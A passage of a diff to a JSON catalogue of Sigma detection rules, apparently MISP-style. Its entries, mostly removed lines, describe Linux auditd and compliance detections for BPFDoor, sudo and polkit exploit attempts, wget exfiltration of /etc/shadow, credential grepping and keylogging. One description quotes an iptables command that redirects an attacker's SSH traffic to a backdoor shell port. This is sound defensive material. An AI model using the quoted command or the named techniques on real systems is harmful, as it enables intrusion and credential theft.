"https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634", - "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/group_modification_logging.yml" - ], - "tags": "No established tags" - }, - "uuid": "9cf01b6c-e723-4841-a868-6d7f8245ca6e", - "value": "Group Modification Logging" - }, - { - "description": "Host Without Firewall. Alert means not complied. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.", - "meta": { - "author": "Alexandr Yampolskyi, SOC Prime", - "creation_date": "2019/03/19", - "falsepositive": "No established falsepositives", - "filename": "host_without_firewall.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "qualys", - "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml" - ], - "tags": "No established tags" - }, - "uuid": "6b2066c8-3dc7-4db7-9db0-6cc1d7b0dde9", - "value": "Host Without Firewall" - }, - { - "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels\nEnsure that an encryption is used for all sensitive information in transit.\nEnsure that an encrypted channels is used for all administrative account access.\n", - "meta": { - "author": "Alexandr Yampolskyi, SOC Prime", - "creation_date": "2019/03/26", - "falsepositive": [ - "Unknown" - ], - "filename": "netflow_cleartext_protocols.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "No established product", - "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml" - ], - "tags": "No established tags" - }, - "uuid": "7e4bfe58-4a47-4709-828d-d86c78b7cc1f", - "value": "Cleartext Protocol Usage Via Netflow" - }, - { - "description": "Automatically lock workstation sessions after a standard period of inactivity.\nThe case is not applicable for Unix OS. Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019.\n", - "meta": { - "author": "Alexandr Yampolskyi, SOC Prime", - "creation_date": "2019/03/26", - "falsepositive": [ - "Unknown" - ], - "filename": "workstation_was_locked.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800", - "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/workstation_was_locked.yml" - ], - "tags": "No established tags" - }, - "uuid": "411742ad-89b0-49cb-a7b0-3971b5c1e0a4", - "value": "Locked Workstation" - }, - { - "description": "Detects change of user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell.", - "meta": { - "author": "Peter Matkovski", - "creation_date": "2019/05/12", - "falsepositive": [ - "Admin or User activity" - ], - "filename": "lnx_auditd_alter_bash_profile.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "MITRE Attack technique T1156; .bash_profile and .bashrc. ", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_alter_bash_profile.yml" - ], - "tags": [ - "attack.s0003", - "attack.persistence", - "attack.t1546.004" - ] - }, - "uuid": "e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9", - "value": "Edit of .bash_profile and .bashrc" - }, - { - "description": "Detects attempts to record audio with arecord utility", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/09/04", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_audio_capture.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://linux.die.net/man/1/arecord", - "https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa", - "https://attack.mitre.org/techniques/T1123/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_audio_capture.yml" - ], - "tags": [ - "attack.collection", - "attack.t1123" - ] - }, - "uuid": "a7af2487-9c2f-42e4-9bb9-ff961f0561d5", - "value": "Audio Capture" - }, - { - "description": "Detect changes in auditd configuration files", - "meta": { - "author": "Mikhail Larin, oscd.community", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate administrative activity" - ], - "filename": "lnx_auditd_auditing_config_change.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/Neo23x0/auditd/blob/master/audit.rules", - "Self Experience", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_auditing_config_change.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.006" - ] - }, - "uuid": "977ef627-4539-4875-adf4-ed8f780c4922", - "value": "Auditing Configuration Changes on Linux Host" - }, - { - "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware.\nThis rule detect using dd and truncate to add a junk data to file.\n", - "meta": { - "author": "Igor Fits, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Legitimate script work" - ], - "filename": "lnx_auditd_binary_padding.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_binary_padding.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.001" - ] - }, - "uuid": "c52a914f-3d8b-4b2a-bb75-b3991e75f8ba", - "value": "Binary Padding - Linux" - }, - { - "description": "detects BPFDoor .lock and .pid files access in temporary file storage facility", - "meta": { - "author": "Rafal Piasecki", - "creation_date": "2022/08/10", - "falsepositive": [ - "Unlikely" - ], - "filename": "lnx_auditd_bpfdoor_file_accessed.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", - "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106", - "attack.t1059" - ] - }, - "uuid": "808146b2-9332-4d78-9416-d7e47012d83d", - "value": "BPFDoor Abnormal Process ID or Lock File Accessed" - }, - { - "description": "All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'\nThe traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.\n", - "meta": { - "author": "Rafal Piasecki", - "creation_date": "2022/08/10", - "falsepositive": [ - "Legitimate ports redirect" - ], - "filename": "lnx_auditd_bpfdoor_port_redirect.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", - "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ] - }, - "uuid": "70b4156e-50fc-4523-aa50-c9dddf1993fc", - "value": "Bpfdoor TCP Ports Redirect" - }, - { - "description": "Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/11/28", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_capabilities_discovery.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://man7.org/linux/man-pages/man8/getcap.8.html", - "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/", - "https://mn3m.info/posts/suid-vs-capabilities/", - "https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml" - ], - "tags": [ - "attack.collection", - "attack.privilege_escalation", - "attack.t1123", - "attack.t1548" - ] - }, - "uuid": "fe10751f-1995-40a5-aaa2-c97ccb4123fe", - "value": "Linux Capabilities Discovery" - }, - { - "description": "Detect file time attribute change to hide new or changes to existing files.", - "meta": { - "author": "Igor Fits, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_change_file_time_attr.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.006" - ] - }, - "uuid": "b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b", - "value": "File Time Attribute Change - Linux" - }, - { - "description": "Detects removing immutable file attribute.", - "meta": { - "author": "Jakob Weinzettl, oscd.community", - "creation_date": "2019/09/23", - "falsepositive": [ - "Administrator interacting with immutable files (e.g. for instance backups)." - ], - "filename": "lnx_auditd_chattr_immutable_removal.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1222.002" - ] - }, - "uuid": "a5b977d6-8a81-4475-91b9-49dbfcd941f7", - "value": "Remove Immutable File Attribute - Auditd" - }, - { - "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/09/24", - "falsepositive": [ - "Legitimate usage of xclip tools" - ], - "filename": "lnx_auditd_clipboard_collection.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1115/", - "https://linux.die.net/man/1/xclip", - "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml" - ], - "tags": [ - "attack.collection", - "attack.t1115" - ] - }, - "uuid": "214e7e6c-f21b-47ff-bb6f-551b2d143fcf", - "value": "Clipboard Collection with Xclip Tool - Auditd" - }, - { - "description": "Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/10/01", - "falsepositive": [ - "Legitimate usage of xclip tools" - ], - "filename": "lnx_auditd_clipboard_image_collection.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1115/", - "https://linux.die.net/man/1/xclip", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml" - ], - "tags": [ - "attack.collection", - "attack.t1115" - ] - }, - "uuid": "f200dc3f-b219-425d-a17e-c38467364816", - "value": "Clipboard Collection of Image Data with Xclip Tool" - }, - { - "description": "Detects command line parameter very often used with coin miners", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/10/09", - "falsepositive": [ - "Other tools that use a --cpu-priority flag" - ], - "filename": "lnx_auditd_coinminer.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://xmrig.com/docs/miner/command-line-options", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_coinminer.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ] - }, - "uuid": "071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed", - "value": "Possible Coin Miner CPU Priority Param" - }, - { - "description": "Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", - "meta": { - "author": "Marie Euler", - "creation_date": "2020/05/18", - "falsepositive": [ - "Admin activity" - ], - "filename": "lnx_auditd_create_account.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "MITRE Attack technique T1136; Create Account ", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml" - ], - "tags": [ - "attack.t1136.001", - "attack.persistence" - ] - }, - "uuid": "759d0d51-bc99-4b5e-9add-8f5b2c8e7512", - "value": "Creation Of An User Account" - }, - { - "description": "Detects exploitation attempt of vulnerability described in CVE-2021-3156.\nAlternative approach might be to look for flooding of auditd logs due to bruteforcing\nrequired to trigger the heap-based buffer overflow.\n", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/02/01", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "cve.2021.3156" - ] - }, - "uuid": "5ee37487-4eb8-4ac2-9be1-d7d14cdc559f", - "value": "CVE-2021-3156 Exploitation Attempt" - }, - { - "description": "Detects exploitation attempt of vulnerability described in CVE-2021-3156.\nAlternative approach might be to look for flooding of auditd logs due to bruteforcing.\nrequired to trigger the heap-based buffer overflow.\n", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/02/01", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "cve.2021.3156" - ] - }, - "uuid": "b9748c98-9ea7-4fdb-80b6-29bed6ba71d2", - "value": "CVE-2021-3156 Exploitation Attempt Bruteforcing" - }, - { - "description": "Detects exploitation attempt of vulnerability described in CVE-2021-4034.", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2022/01/27", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_cve_2021_4034.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/berdav/CVE-2021-4034", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034", - "https://access.redhat.com/security/cve/CVE-2021-4034", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ] - }, - "uuid": "40a016ab-4f48-4eee-adde-bbf612695c53", - "value": "CVE-2021-4034 Exploitation Attempt" - }, - { - "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2019/10/21", - "falsepositive": [ - "Legitimate use of archiving tools by legitimate user." - ], - "filename": "lnx_auditd_data_compressed.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_compressed.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1560.001" - ] - }, - "uuid": "a3b5e3e9-1b49-4119-8b8e-0344a01f21ee", - "value": "Data Compressed" - }, - { - "description": "Detects attempts to post the file with the usage of wget utility.\nThe adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.\n", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/11/18", - "falsepositive": [ - "Legitimate usage of wget utility to post a file" - ], - "filename": "lnx_auditd_data_exfil_wget.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/tactics/TA0010/", - "https://linux.die.net/man/1/wget", - "https://gtfobins.github.io/gtfobins/wget/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ] - }, - "uuid": "cb39d16b-b3b6-4a7a-8222-1cf24b686ffc", - "value": "Data Exfiltration with Wget" - }, - { - "description": "Detects overwriting (effectively wiping/deleting) of a file.", - "meta": { - "author": "Jakob Weinzettl, oscd.community", - "creation_date": "2019/10/23", - "falsepositive": [ - "Appending null bytes to files.", - "Legitimate overwrite of files." - ], - "filename": "lnx_auditd_dd_delete_file.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_dd_delete_file.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ] - }, - "uuid": "37222991-11e9-4b6d-8bdf-60fbe48f753e", - "value": "Overwriting the File with Dev Zero or Null" - }, - { - "description": "Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2022/01/22", - "falsepositive": [ - "Admin activity" - ], - "filename": "lnx_auditd_disable_system_firewall.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", - "https://attack.mitre.org/techniques/T1562/004/", - "https://firewalld.org/documentation/man-pages/firewall-cmd.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml" - ], - "tags": [ - "attack.t1562.004", - "attack.defense_evasion" - ] - }, - "uuid": "53059bc0-1472-438b-956a-7508a94a91f0", - "value": "Disable System Firewall" - }, - { - "description": "Detects file and folder permission changes.", - "meta": { - "author": "Jakob Weinzettl, oscd.community", - "creation_date": "2019/09/23", - "falsepositive": [ - "User interacting with files permissions (normal/daily behaviour)." - ], - "filename": "lnx_auditd_file_or_folder_permissions.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1222.002" - ] - }, - "uuid": "74c01ace-0152-4094-8ae2-6fd776dd43e5", - "value": "File or Folder Permissions Change" - }, - { - "description": "Detecting attempts to extract passwords with grep", - "meta": { - "author": "Igor Fits, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_find_cred_in_files.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.001" - ] - }, - "uuid": "df3fcaea-2715-4214-99c5-0056ea59eb35", - "value": "Credentials In Files - Linux" - }, - { - "description": "Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/09/06", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_hidden_files_directories.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", - "https://attack.mitre.org/techniques/T1564/001/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ] - }, - "uuid": "d08722cd-3d09-449a-80b4-83ea2d9d4616", - "value": "Hidden Files and Directories" - }, - { - "description": "Detects appending of zip file to image", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/09/09", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_hidden_zip_files_steganography.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1027/003/", - "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.003" - ] - }, - "uuid": "45810b50-7edc-42ca-813b-bdac02fb946b", - "value": "Steganography Hide Zip Information in Picture File" - }, - { - "description": "Detect attempt to enable auditing of TTY input", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/05/24", - "falsepositive": [ - "Administrative work" - ], - "filename": "lnx_auditd_keylogging_with_pam_d.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md", - "https://attack.mitre.org/techniques/T1003/", - "https://linux.die.net/man/8/pam_tty_audit", - "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing", - "https://access.redhat.com/articles/4409591#audit-record-types-2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1056.001" - ] - }, - "uuid": "49aae26c-450e-448b-911d-b3c13d178dfc", - "value": "Linux Keylogging with Pam.d" - }, - { - "description": "Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.", - "meta": { - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_ld_so_preload_mod.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md", - "https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.006" - ] - }, - "uuid": "4b3cb710-5e83-4715-8c45-8b2b5b3e5751", - "value": "Modification of ld.so.preload" - }, - { - "description": "Detects loading of kernel modules with insmod command.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nAdversaries may use LKMs to obtain persistence within the system or elevate the privileges.\n", - "meta": { - "author": "Pawel Mazur", - "creation_date": "2021/11/02", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_auditd_load_module_insmod.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://attack.mitre.org/techniques/T1547/006/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md", - "https://linux.die.net/man/8/insmod", - "https://man7.org/linux/man-pages/man8/kmod.8.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.006" - ] - }, - "uuid": "106d7cbd-80ff-4985-b682-a7043e5acb72", - "value": "Loading of Kernel Module via Insmod" - }, - { - "description": "Detect changes of syslog daemons configuration files", - "meta": { - "author": "Mikhail Larin, oscd.community", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate administrative activity" - ], - "filename": "lnx_auditd_logging_config_change.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "self experience", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_logging_config_change.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.006" - ] - }, - "uuid": "c830f15d-6f6e-430f-8074-6f73d6807841", - "value": "Logging Configuration Changes on Linux Host" - }, - { - "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.\nSeveral different variations of this technique have been observed.\n", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2019/10/21", - "falsepositive": "No established falsepositives", - "filename": "lnx_auditd_masquerading_crond.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003" - ] - }, - "uuid": "9d4548fa-bba0-4e88-bd66-5d5bf516cda0", - "value": "Masquerading as Linux Crond Process" - }, - { - "description": "Detects enumeration of local or remote network services.", - "meta": { - "author": "Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/21", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "lnx_auditd_network_service_scanning.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_service_scanning.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_susp_network_scan_by_port.yml" ], "tags": [ "attack.discovery", "attack.t1046" ] }, - "uuid": "3761e026-f259-44e6-8826-719ed8079408", - "value": "Linux Network Service Scanning - Auditd" - }, - { - "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2019/10/21", - "falsepositive": [ - "Legitimate administrator or user uses network sniffing tool for legitimate reasons." - ], - "filename": "lnx_auditd_network_sniffing.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_sniffing.yml" - ], - "tags": [ - "attack.credential_access", - "attack.discovery", - "attack.t1040" - ] - }, - "uuid": "f4d3748a-65d1-4806-bd23-e25728081d01", - "value": "Network Sniffing - Linux" - }, - { - "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager.\nMicrosoft Azure, and Microsoft Operations Management Suite.\n", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2021/09/17", - "falsepositive": [ - "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." - ], - "filename": 